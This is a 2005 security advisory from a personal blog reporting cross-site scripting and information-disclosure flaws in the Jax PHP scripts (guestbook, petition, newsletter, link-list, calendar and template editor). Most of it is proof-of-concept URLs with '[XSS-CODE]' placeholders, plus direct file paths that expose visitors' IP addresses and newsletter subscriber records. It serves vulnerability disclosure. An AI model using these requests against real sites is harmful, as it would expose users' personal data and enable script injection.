############################################
Jax PHP Scripts multiple vulnerabilities
vendor url:http://www.jtr.de/scripting/php/
Advisory:http://lostmon.blogspot.com/2005/08/
jax-php-scripts-multiple.html
vendor notify:yes exploit available:yes
OSVDB ID:18568,18569,18570,18571,18572,18573,18574,18575,18576,
18577,18578,18579,18580,18581,18582,18583,18584,18585,18586,
Secunia: SA16332,SA16333,SA16337,SA16338
BID: 14481
#############################################
###########
sumary:
###########
0- Description.
1- Products affected.
2- Jax Guestbook report.
3- Jax Petitionbook report.
4- Jax Newsletter report.
5- Jax LinkLists report.
6- Jax Calendar report.
7- Jax DWT Editor report.
8- Timeline
###############
0- Description
###############
Jax scripts is a collection of usefull php scripts to added or include in a web-site.
Jax Guestbook (GPL)* ==> php script for running a WWW Guestbook
Jax Petitionbook (GPL)* ==> adaption of Jax Guestbook for running a WWW Petitionbook
Jax Newsletter (GPL)* ==> php script for running online Mailing lists / Newsletters
(Mailing List Manager)
Jax LinkLists (GPL)* ==> php script for running simple Hyperlink Lists
(Hyperlink Manager)
Jax Calendar (GPL)* ==> php script for running a simple Web Calendar
(calendar manager)
Jax DWT Editor (GPL)* ==> php script for editing html files based on Dreamweaver templates
(Template Editor)
###################
1-Products affected
###################
Jax Guestbook ==> Cross-Site Scripting and information disclosure.
Jax Petitionbook ==> Cross-Site Scripting and information disclosure.
Jax Newsletter ==> Cross-Site Scripting and information disclosure.
Jax LinkLists ==> Cross-Site Scripting and information disclosure.
Jax Calendar ==> Cross-Site Scripting.
Jax DWT Editor ==> Cross-Site Scripting.
##################
2- Jax Guestbook
##################
Cross-Site Scripting and information disclosure:
http://[victim]/guestbook/jax_guestbook.php?page=2&language=
english&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/jax_guestbook.php?page=2&language=english
[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?page=2
[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?mailto=
9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]
http://[victim]/guestbook/guestbook
// clients ip who have post a firm in guestbook
http://[victim]/guestbook/guestbook_ips2block
//list of ips banned
http://[victim]/guestbook/ips2block
//list of ips banned
http://[victim]/guestbook/formmailer/logfile.csv
// ips ,from users send via formmail.php script.
################
versions
###############
Jax Guestbook v3.1
Jax Guestbook v3.31
###################
3- Jax Petitionbook
###################
Cross-Site Scripting and information disclosure:
http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/petitionbook/shrimp_petition.php?page=3
&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/shrimp_petition.php?page=3
[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/formmailer.log
// all ip , and message what all users sent via formmail
http://[victim]/petitionbook/ips2block
//all ips banned
http://[victim]/petitionbook/petitionbook
//all ips of people have signed the petition
#################
4- Jax Newsletter
#################
Cross-Site Scripting and information disclosure:
http://[victim]/newsletter/jax_newsletter.php?language=
German[XSS-CODE]&ml_id=1
http://[victim]/newsletter/sign_in.php?do=sign_in
&language=german[XSS-CODE]&ml_id=1&ml_id=1
http://[victim]/newsletter/archive.php?
language=spanish[XSS-CODE]
http://[victim]/newsletter/logs/jnl_records
// information disclosure form users ,direct request
to this file reveals:
"email","hash","mail_format","gender","nick","mode",
"groups","action","time","ip","age","profession",
"nationality" from registered users.
############
versions
############
Jax Newsletter v2.14
Jax Newsletter v2.10
#################
5- Jax LinkLists
#################
Cross-Site Scripting and information disclosure:
http://[victim]/linklists/jax_linklists.php?
language=English[XSS-CODE]
http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]
http://[victim]/linklists/suggestions.csv
// direct request disclose ip of client who
have suggest a link.
#############
versions
#############
Jax LinkLists v1.1
Jax LinkLists v1.0
#################
6- Jax Calendar
#################
Cross-Site Scripting:
http://[victim]/calendar/jax_calendar.php?Y=2005
[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd0
9437c00badaf419eb0db5&cal_id=0&language=spanish&
gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-
%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-
+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8
[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00ba
daf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=
d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18
%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im
+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419e
b0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karls
ruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Fe
ld[XSS-CODE]
http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&
cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE]
// all variables affected by XSS flaws
http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE]
// all variables affected by XSS flaws
http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30
// all variables afected by XSS flaws
##############
versions
##############
Jax Calendar 1.34
Jax Calendar 1.33
#################
7- Jax DWT Editor
#################
Cross-Site Scripting:
http://[victim]/dwt_editor/dwt_editor.php?language=english
[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?language=english
&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=
%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=
german&area=textbereich2[XSS-CODE]
##############
versions
##############
Jax DWT Editor v1.0
###################
8- Timeline
###################
discovered:27-07-2005
Vendor notify:04-08-2005
vendor response:04-08-2005
disclosure:05-08-2005
#################### €nd #############################
Thnx to estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
skip to main |
skip to sidebar
Security Research & Analisys:
Personal Blog where I expose my investigations,
advisores and some outstanding news on security.
Categories
Archives
-
►
2022
(2)
- ► November 2022 (1)
- ► October 2022 (1)
-
►
2013
(2)
- ► December 2013 (1)
- ► August 2013 (1)
-
►
2012
(5)
- ► April 2012 (1)
-
►
2011
(5)
- ► October 2011 (1)
- ► March 2011 (1)
-
►
2010
(18)
- ► December 2010 (2)
- ► September 2010 (1)
- ► March 2010 (1)
- ► February 2010 (1)
- ► January 2010 (1)
-
►
2009
(25)
- ► November 2009 (1)
- ► April 2009 (1)
- ► March 2009 (1)
- ► February 2009 (1)
-
►
2008
(24)
- ► August 2008 (9)
- ► April 2008 (1)
- ► March 2008 (1)
-
►
2007
(29)
- ► October 2007 (1)
- ► March 2007 (1)
-
►
2006
(14)
- ► August 2006 (1)
- ► February 2006 (1)
-
▼
2005
(54)
- ► December 2005 (1)
- ▼ August 2005 (2)
- ► April 2005 (14)
Browse
About:Me
My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
La curiosidad es lo que hace
mover la mente...
Online Tools & Calculators
Posts
Lostmon Blogger © All Rights Reserved